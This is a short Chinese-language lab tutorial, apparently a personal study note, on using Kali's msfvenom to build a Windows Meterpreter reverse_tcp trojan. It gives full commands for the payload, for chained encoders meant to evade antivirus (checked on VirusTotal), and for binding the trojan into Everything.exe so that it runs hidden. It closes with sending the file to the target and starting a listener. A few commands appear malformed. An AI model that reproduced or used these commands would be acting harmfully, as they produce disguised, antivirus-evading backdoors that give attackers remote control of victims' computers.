实验环境:kali(10.250.70.251)
Windows x32位(10.250.70.252)
第一步:确保二者之间的网络能够相互ping通
注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。
第二步:打开kali启动msfvenom,制作木马
制作常规的木马:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.250.70.251 LPORT=5555 -f exe -o /root/a.exe
将该病毒放到windows上面
在windows上面打开杀毒引擎网站查看该病毒软件:
https://www.virscan.org/
https://www.virustotal.com/gui/home/upload
可以看到明显报错,查出来病毒较多
制作免杀的木马:
msfvenom -a x86 --platform -p windows/meterpreter/reverse_tcp lhost=10.250.70.251 lport=5555 -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -x -f exe -o /root/b.exe
在windows上面打开杀毒引擎网站查看该病毒软件:
可以看到扫描出来的病毒明显减少
第三步:木马捆绑,(主程序启动之后子程序随之启动)
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=10.250.70.251 lport=5555 -f exe -x Everything.exe -o /root/Everything2.exe
第四步:将生成的捆绑木马发到windows主机,并且打开msf的监听模块